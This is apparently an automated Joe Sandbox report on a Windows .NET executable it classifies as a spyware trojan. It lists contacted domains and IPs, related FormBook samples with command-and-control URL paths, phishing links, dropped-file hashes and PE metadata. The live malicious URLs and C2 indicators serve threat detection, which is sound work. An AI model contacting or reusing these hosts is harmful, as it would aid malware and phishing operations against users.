| http://www.jcsa.info/__media__/js/trademark.php?d=jcsa.info&type=dflt | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| https://www.ecosia.org/newtab/ | waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | waitfor.exe, 00000007.00000002.3813572544.00000000044F1000.00000004.00000020.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000004E7C000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000000.1710385375.000000000298C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.1949830012.0000000001B1C000.00000004.80000000.00040000.00000000.sdmp, suBpo1g13Q.exe | false | | high |
| https://ac.ecosia.org/autocomplete?q= | waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmp | false | | high |
| http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://www.jcsa.info/Best_Online_University.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImm0i | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://i4.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2 | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://i4.cdn-image.com/__media__/js/min.js?v2.3 | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
| http://www.register.com?trkID=WSTm3u15CW | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown |
| http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff | waitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmp | false | | high |
                                                                                                          http://www.jcsa.info/Japanese_Language_School.cfm?fp=lb%2BPnXhD9C%2Fd8Bxw3PrZGZ73tgTdrp1kqELRDu1yImmwaitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://www.register.com/whois.rcmx?domainName=Jcsa.infowaitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                          • Avira URL Cloud: safe
                                                                                                          unknown
                                                                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=waitfor.exe, 00000007.00000002.3818235867.0000000007B18000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            http://i4.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-boldwaitfor.exe, 00000007.00000002.3818038992.0000000007710000.00000004.00000800.00020000.00000000.sdmp, waitfor.exe, 00000007.00000002.3815889613.0000000006086000.00000004.10000000.00040000.00000000.sdmp, iBkWOgpZKSoi.exe, 00000008.00000002.3814300292.0000000003B96000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              • No. of IPs < 25%
                                                                                                              • 25% < No. of IPs < 50%
                                                                                                              • 50% < No. of IPs < 75%
                                                                                                              • 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
101.35.209.183 | www.yc791022.asia | China | 132203 | TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN | false
209.74.77.109 | www.greenthub.life | United States | 31744 | MULTIBAND-NEWHOPEUS | true
149.88.81.190 | www.xcvbj.asia | United States | 188 | SAIC-ASUS | false
13.248.169.48 | www.optimismbank.xyz | United States | 16509 | AMAZON-02US | true
188.114.97.3 | www.zkdamdjj.shop | European Union | 13335 | CLOUDFLARENETUS | false
23.225.159.42 | r0lqcud7.nbnnn.xyz | United States | 40065 | CNSERVERSUS | false
43.205.198.29 | www.1secondlending.one | Japan | 4249 | LILLY-ASUS | false
103.224.182.242 | www.madhf.tech | Australia | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | false
208.91.197.39 | www.jcsa.info | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
46.30.211.38 | www.bankseedz.info | Denmark | 51468 | ONECOMDK | false
154.23.178.231 | 43kdd.top | United States | 174 | COGENT-174US | false
202.92.5.23 | thaor56.online | Viet Nam | 45899 | VNPT-AS-VNVNPTCorpVN | true
Joe Sandbox version: 42.0.0 Malachite
Analysis ID: 1588629
Start date and time: 2025-01-11 03:22:50 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 22s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: suBpo1g13Q.exe (renamed because the original name is a hash value)
Original Sample Name: b7b7efd934672f580ac36002b4f9524decc68c309052dbdf16f26c48c6d1d268.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@9/2@12/12
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 91%
• Number of executed functions: 90
• Number of non-executed functions: 288
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 13.107.246.45, 184.28.90.27, 52.149.20.212
• Excluded domains from analysis (whitelisted): fs.microsoft.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information.
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
21:23:48 | API Interceptor | 1x Sleep call for process: suBpo1g13Q.exe modified
21:24:55 | API Interceptor | 9788525x Sleep call for process: waitfor.exe modified
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              101.35.209.183PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.yc791022.asia/wu7k/
                                                                                                              Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • www.yc791022.asia/31pt/?2O=TMDpBYanOquY9Rx47rOd3KwxNkoHefYhv73C9/MKdrwqjZcj4ORMyeHFBityLVio1oCUCVJYl2rwHayMePC/S1ZjuitrANQdk8OOJhWAxEqHZ6TqwRsh8gk=&ChhG6=J-xs
                                                                                                              Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.yc791022.asia/31pt/
                                                                                                              Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                              • www.yc791022.asia/wu7k/
                                                                                                              PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.yc791022.asia/31pt/
                                                                                                              Purchase Order PO.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.yc791022.asia/wu7k/
                                                                                                              PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                              • www.yc791022.asia/grmn/
                                                                                                              209.74.77.109BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.moviebuff.info/4r26/
                                                                                                              KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.dailyfuns.info/n9b0/?F4=Q0yHy&xP7x=A8VrqyfvUbO/Hw2LPQ1UsX5BwNVpcsHZj5dGp0FbdWJo87i+fAzGqY/WbkPjYDkNrmWhazG0hIjSjfnpkftd6thTTSLohUKEi8xodPTyp3tNekr0IM36mEI=
                                                                                                              Invoice 10493.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.dailyfuns.info/n9b0/?IUY=A8VrqyfvUbO/Hw2LPQ4NsXlD/s5AVNHZj5dGp0FbdWJo87i+fAzGqYzWbkPjYDkNrmWhazG0hIjSjfnpkftd/stSTEWpskOuncpocPTypnt0UF6pA8n7oU4=&h7i-=tZtx
                                                                                                              Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • www.greenthub.life/r3zg/?ChhG6=J-xs&2O=du4jOMLkh7fLnmDtVoK+d8rG/j+33GGjaV3EKcXkS3D/yxi6pio40SubWtKrR6Fw1AeDGXhTcKeneAqCGOT0/aNCu6YrtTGBPMZlno0p/0xRAVz3vwpdvYc=
                                                                                                              Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.greenthub.life/r3zg/
                                                                                                              A2028041200SD.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.dailyfuns.info/n9b0/
                                                                                                              W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                              • www.gogawithme.live/6gtt/
                                                                                                              DO-COSU6387686280.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                              • www.futuru.xyz/8uep/
                                                                                                              PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.greenthub.life/r3zg/
                                                                                                              file.exeGet hashmaliciousFormBookBrowse
                                                                                                              • www.moviebuff.info/4r26/
                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                              www.optimismbank.xyzDocument_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • 13.248.169.48
                                                                                                              Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 13.248.169.48
                                                                                                              PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 13.248.169.48
                                                                                                              SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 13.248.169.48
                                                                                                              www.bankseedz.infoRFQ_P.O.1212024.scrGet hashmaliciousFormBookBrowse
                                                                                                              • 46.30.211.38
                                                                                                              NEW.RFQ00876.pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 46.30.211.38
                                                                                                              Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • 46.30.211.38
                                                                                                              Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 46.30.211.38
                                                                                                              PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 46.30.211.38
                                                                                                              s-part-0017.t-0009.t-msedge.net1297823757234143258.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                              • 13.107.246.45
                                                                                                              4N4nldx1wW.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 13.107.246.45
                                                                                                              1487427797195518826.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                              • 13.107.246.45
                                                                                                              5by4QM3v89.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 13.107.246.45
                                                                                                              uEuTtkxAqq.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                              • 13.107.246.45
                                                                                                              23754232101540928500.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                              • 13.107.246.45
                                                                                                              rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                              • 13.107.246.45
                                                                                                              CGk5FtIq0N.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 13.107.246.45
                                                                                                              wOBmA8bj8d.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 13.107.246.45
                                                                                                              KtPCqWWnqM.exeGet hashmaliciousUnknownBrowse
                                                                                                              • 13.107.246.45
                                                                                                              www.madhf.techAxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 103.224.182.242
                                                                                                              tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 103.224.182.242
                                                                                                              M7XS5C07kV.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 103.224.182.242
                                                                                                              PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 103.224.182.242
                                                                                                              Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                              • 103.224.182.242
                                                                                                              New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 103.224.182.242
                                                                                                              Purchase Order..exeGet hashmaliciousFormBookBrowse
                                                                                                              • 103.224.182.242
                                                                                                              YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 103.224.182.242
                                                                                                              Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                              • 103.224.182.242
                                                                                                              Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                              • 103.224.182.242
Match
  Associated Sample Name / URL | Detection | Threat Name | Context
SAIC-AS (US)
  uG3I84bQEr.exe | malicious | FormBook | 149.88.81.190
  Fantazy.x86.elf | malicious | Unknown | 149.88.225.249
  momo.arm7.elf | malicious | Mirai | 149.65.180.173
  xd.ppc.elf | malicious | Mirai | 149.88.70.60
  xd.mpsl.elf | malicious | Mirai | 149.112.181.228
  nklsh4.elf | malicious | Unknown | 149.88.70.11
  loligang.mpsl.elf | malicious | Mirai | 149.65.132.204
  m68k.elf | malicious | Mirai, Moobot | 149.64.118.107
  nshsh4.elf | malicious | Mirai | 149.118.255.217
  mips.nn.elf | malicious | Mirai, Okiru | 149.88.233.72
TENCENT-NET-AP-CN TencentBuildingKejizhongyiAvenue (CN)
  https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f | malicious | HTMLPhisher | 170.106.97.195
  https://atpscan.global.hornetsecurity.com/?d=W3rdHn1Og9hhUJnVJzqWF36wMmxswAZldvtx3E21ybg&f=v8m9AqGfgV2Ri7cjqmfsuyl2V2Mu_lVW0BRsqcFw4upagWAQ1C-MqANvN6gf4zNV&i=&k=xREg&m=b_ORYMkPffImCXbCPli-aiR7Ga6rGe55sar2xtigCL4MrowDPSzt7ABKETTGxzegakAfoZ57KD02aVix8V8TVmZ2VcxzjeybXYrPiS2SB73LCKYktj5jv2aw6VcPRslz&n=s4crRkyHC4bab6S3yrgn1E3n-VmdqgfSqNiaCJyPrf6hnyL_SE4PHEo5SUcwwsFGV6rnB35iQFM5FLsE91obvZ0HTAEiqHnB8ROLzY5JVgg&r=oMs_cp4DXIjeQhcPWsPLyR3_oxBVUN4Iok_tSVE4DNNtzqeot7ZzvdXkh4vatwpC&s=bd82eb507a358fd35f72f18b86e67f3bfc1ce64bbeab0c01d700897b1b678efb&u=https%3A%2F%2Fe.trustifi.com%2F%23%2Ffff2af%2F32054d%2F67960f%2Fee6fed%2F5d1d11%2F46c760%2Ff79190%2Fc5ec40%2Fe8666a%2Fef542d%2F85972d%2F627493%2F9a11d6%2F1f4096%2F1d247f%2F818e78%2Fc53383%2Fd59aa0%2Fedfa57%2F7914c7%2Fc38cf6%2Ff74f56%2Ff45915%2F39dbbd%2Ff48710%2F1ddf22%2F37d5f2%2F9de9f7%2F96109e%2F882355%2F854b66%2F9d606d%2F2d0447%2Fad3b01%2F637d1c%2F3c0f2b%2F606f48%2Fa6d904%2F8fefe3%2F00a4bb%2F6520c6%2F9b795c%2Fb7de1a%2Fb5dde6%2F3f5692%2F997c7d%2Fc00925%2F782cce%2F511459%2Fab5aa8%2F91722a%2Feec933%2F3f4f91%2F894088%2F43adfa%2Fb78195%2F0407d0%2F56f022%2Fddf20e%2F946567%2Faa271a%2F507b7a%2Faccd06%2F50d63c%2F485c4b%2F07ced8%2Fd0ec21%2F260ce6%2Fb5edbb%2F79a81e%2F1fd160%2Ff4da41%2F7073e0%2F8a5e9a%2Fdac829%2F521e52%2Fa1a847%2F13ea63%2Fabb5a3%2Fe1901e%2Fd876f6%2F7b0bf4%2Fbd19df%2F89bdcd%2F1874d8%2F0fb7f3%2F72f438%2Fa098c5%2F4e2214%2F4b6e54%2F0c4a8f | malicious | HTMLPhisher | 170.106.97.196
  ofZiNLLKZU.exe | malicious | FormBook | 101.32.205.61
  https://app.whirr.co/p/cm4711if90205nv0h2e4l0imu | malicious | Unknown | 170.106.97.195
  ReIayMSG__polarisrx.com_#7107380109.htm | malicious | HTMLPhisher | 119.28.146.206
  ReIayMSG__polarisrx.com_#6577807268.htm | malicious | HTMLPhisher | 119.28.147.117
  VM_MSG-Gf.htm | malicious | HTMLPhisher | 119.28.147.117
  https://e.trustifi.com/#/fff2a0/670719/6dc158/ef68bf/5e1243/19ce62/f4cd99/c6b84a/e8666a/ef542d/85972d/627493/9a11d6/1f4096/1d247f/d78873/cd64d0/869af2/e9ab57/7015c1/91dda7/f34c0a/f30b47/688cba/a1d645/18dc79/33d9f9/9ee0a0/c61099/8f2456/8e1864/996369/790047/a93a09/347b17/38082d/363d49/f88c07/81bae2/57a7bb/6027c6/942952/b2de1b/e98aef/6a05c2/91297b/c70871/7f29c3/0a450d/ad0cac/967c2a/e7cb67/6e1193/8c4088/13aef1/e1d296/5056d4/51a97e/89a35b/c13e69/fa274a/5b7c2e/a8c901/02856f/1e0211/03ca84/d7b573/7e0de3/e2bdbb/7cab47/4dd465/addb41/2076e1/85559c/dbcb2d/514505/a6a54e/41e864/abb5a5/e59e4b/8c2df6/7e5cf3/b648da/8fbd98/4c7d8a/08e6a3/72f66f/a49cc6/18211b/1e6a5c/0d4fde | malicious | HTMLPhisher | 49.51.78.226
  https://jmak-service.com/3225640388 | malicious | HTMLPhisher | 49.51.77.119
  https://pozaweclip.upnana.com/ | malicious | Unknown | 170.106.97.195
MULTIBAND-NEWHOPE (US)
  k9OEsV37GE.exe | malicious | FormBook | 209.74.79.41
  XeFYBYYj0w.exe | malicious | FormBook | 209.74.79.41
  BcF3o0Egke.exe | malicious | FormBook | 209.74.77.109
  hgq5nzWJll.exe | malicious | FormBook | 209.74.79.42
  5CTbduoXq4.exe | malicious | FormBook | 209.74.77.107
  gH3LlhcRzg.exe | malicious | FormBook | 209.74.79.40
  0Wu31IhwGO.exe | malicious | FormBook | 209.74.77.107
  NFhRxwbegd.exe | malicious | FormBook | 209.74.77.107
  9MZZG92yMO.exe | malicious | FormBook | 209.74.79.41
  OVZizpEU7Q.exe | malicious | FormBook | 209.74.77.107
No context
No context
Process: C:\Users\user\Desktop\suBpo1g13Q.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\waitfor.exe
File Type: SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category: dropped
Size (bytes): 196608
Entropy (8bit): 1.1211596417522893
Encrypted: false
SSDEEP: 192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
MD5: 0AB67F0950F46216D5590A6A41A267C7
SHA1: 3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
SHA-256: 4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
SHA-512: D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
Malicious: false
Reputation: moderate, very likely benign file
Preview: SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.266498862419901
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 50.01%
• Win32 Executable (generic) a (10002005/4) 49.97%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: suBpo1g13Q.exe
File size: 983'048 bytes
MD5: d8ba09db25afabba3143cb47dd6b8f37
SHA1: 5e19b80e13c51ac6f3e1d196e5c3b73ecefd5e98
SHA256: b7b7efd934672f580ac36002b4f9524decc68c309052dbdf16f26c48c6d1d268
SHA512: b5ddf9ae8ee77ef334fd8883b3957c08b0e3bd0548ba461f7bd98af75c03351d9029657ba041071bd23ec6bf7b34d277cf9929efc693da7bb4987d4ce8f99d44
SSDEEP: 12288:apZsS9yXXWSOsMzYBfol8kUFQSe8IuRQ8Dn68/0WkR:azsd2SnDoGkhSHVnp/0N
TLSH: D925F73D29BD222BA175C397CBEBF427F538986F3114ACA458D343A94346A4774C326E
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.................0.................. ........@.. ....................... ............@................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x4edeba
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
